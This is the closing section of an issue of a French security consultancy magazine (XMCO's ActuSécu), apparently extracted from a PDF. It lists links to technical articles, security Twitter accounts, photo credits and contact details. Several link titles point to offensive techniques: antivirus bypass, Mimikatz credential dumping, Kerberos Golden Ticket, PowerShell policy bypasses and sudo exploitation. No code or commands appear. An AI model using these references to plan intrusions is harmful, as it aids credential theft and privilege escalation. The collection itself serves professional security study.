Points vrifier pour confirmer la compromis- http://sysforensics.org/2014/01/lateral-movement.


sion dune machine html

Article intressant sur les mesures anti foren- http://forensicmethods.com/snowden-forensics


sic prises aprs Snowden https://gist.github.com/p0c/8587757

http://www.forensickb.com/2014/02/understan-
Comment fonctionne hyper V
ding-hyper-v-server-when-doing.html

Article sur la Surface area reduction de https://labs.portcullis.co.uk/blog/ms-sql-server-audit-


MSSQL surface-area-reduction-part-1/

h t t p : // w w w. p o w e r s h e l l m a g a z i n e . co m / s t a -
Une faille lie au CredSSP via PowerShell
ging/?p=8794

Comment fonctionne lUAC sous Windows et http://blog.strategiccyber.com/2014/03/20/user-ac-


ses contournements count-control-what-penetration-testers-should-know/

Mieux comprendre les permissions des objets h t t p : // b l o g . c a s s i d i a n c y b e r s e c u r i t y. c o m /


post/2014/03/The-Active-Directory-Permissions-Ana-
Active Directory
lysis-Challenge

Whitepaper pour scuriser ESXi http://blogs.vmware.com/vsphere/2014/02/secu-


rity-vmware-hypervisor-whitepaper.html

62 62
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le meilleur du web

> Slection darticles techniques

Contournement dun antivirus avec un MSI et https://www.netspi.com/blog/entryid/212/bypas-


son lvation de privilges sing-anti-virus-with-metasploit-msi-files

Comment excuter des commandes via MySQL http://www.iodigitalsec.com/mysql-root-to-system-


avec la librairie LIB_MYSQLUDF_SYS root-with-udf-for-windows-and-linux/

Comment rcuperer des mots de passe dun fi- http://www.remkoweijnen.nl/blog/2013/11/25/


chier VMware .vmem avec MimiKatz dumping-passwords-in-a-vmware-vmem-file/

Prsentation des droits Se* sous Windows http://labs.portcullis.co.uk/blog/se-and-you/

Utilisation de la fonction Golden Ticket Kerbe-


http://rycon.hu/papers/goldenticket.html
ros avec MimiKatz

Comment se protger des XSS via la configura- h t t p s : // i s c . s a n s . e d u / d i a r y / M a s s + X S -


tion de PHP Sodus+in+PHP/17867

http://articles.forensicfocus.com/2014/04/28/win-
Comment extraire les mots de passe en m- dows-logon-password-get-windows-logon-password-
moire via un plug-in Volatility using-wdigest-in-memory-dump/

15 techniques pour contourner la prvention


https://www.netspi.com/blog/entryid/238/15-ways-
dexcution de script PowerShell

http://ecstaticsec.tumblr.com/post/87205770569/su-
Exploitation des failles Sudo do-tricks

Outil pour mieux debugger les RegExp https://www.debuggex.com/

63 63

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.

we deliver security expertise

> Slection des comptes Twitter suivis


par le CERT-XMCO

Didier Stevens https://twitter.com/DidierStevens

Dan Kaminsky https://twitter.com/dakami

Travis Goodspeed https://twitter.com/travisgoodspeed

Joffrey Czarny https://twitter.com/_Sn0rkY

Veil Framework https://twitter.com/veilframework

Will https://twitter.com/harmj0y

Passing the Hash https://twitter.com/passingthehash

SANS Pen Test Info https://twitter.com/pentesttips

Armitage Hacker https://twitter.com/armitagehacker

Benjamin Delpy https://twitter.com/gentilkiwi

64
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Romain MAHIEU
> Remerciements
Photographie

Photo HITB
http://photos.hitb.org/

Photo Hack In Paris 2014


https://www.flickr.com/photos/126259186@N05/

Alan Bates
https://www.flickr.com/photos/sp3ccylad/495871118/

Tomaz Stolfa
https://www.flickr.com/photos/tomazstolfa/4969030884/

Urban Bamboo
https://www.flickr.com/photos/urbanbamboo/9502886057/

Andrea
https://www.flickr.com/photos/spettacolopuro/3891599149/

Dimitar Krstevski
https://www.flickr.com/photos/alifaan/2608045107/

Joe Pemberton
https://www.flickr.com/photos/joepemberton/8986322869/

Stefanos Kofopoulos
https://www.flickr.com/photos/titanas/3199323703/

Kevin Baird
https://www.flickr.com/photos/kevlar/4640627653/

Errol Images Mdia


https://www.flickr.com/photos/errol_51/4190034449/

Nikolay Bachiyski
https://www.flickr.com/photos/nbachiyski/2536017020/

LActuScu est un magazine numrique rdig et dit par les consultants du cabinet
de conseil XMCO. Sa vocation est de fournir des prsentations claires et dtailles sur le
thme de la scurit informatique, et ce, en toute indpendance. Tous les numros de
lActuScu sont tlchargeables ladresse suivante :
http://www.xmco.fr/actusecu.html 65

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
www.xmco.fr

69 rue de Richelieu
75002 Paris - France

tl. +33 (0)1 47 34 68 61


fax. +33 (0)1 43 06 29 55
mail. info@xmco.fr
web www.xmco.fr

SAS (Socits par Actions Simplifies) au capital de 38 120 - Enregistre au Registre du Commerce de Paris RCS 430 137 711
Code NAF 6202A - NSIRET : 430 137 711 00056 - N TVA intracommunautaire : FR 29 430 137 711

66
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.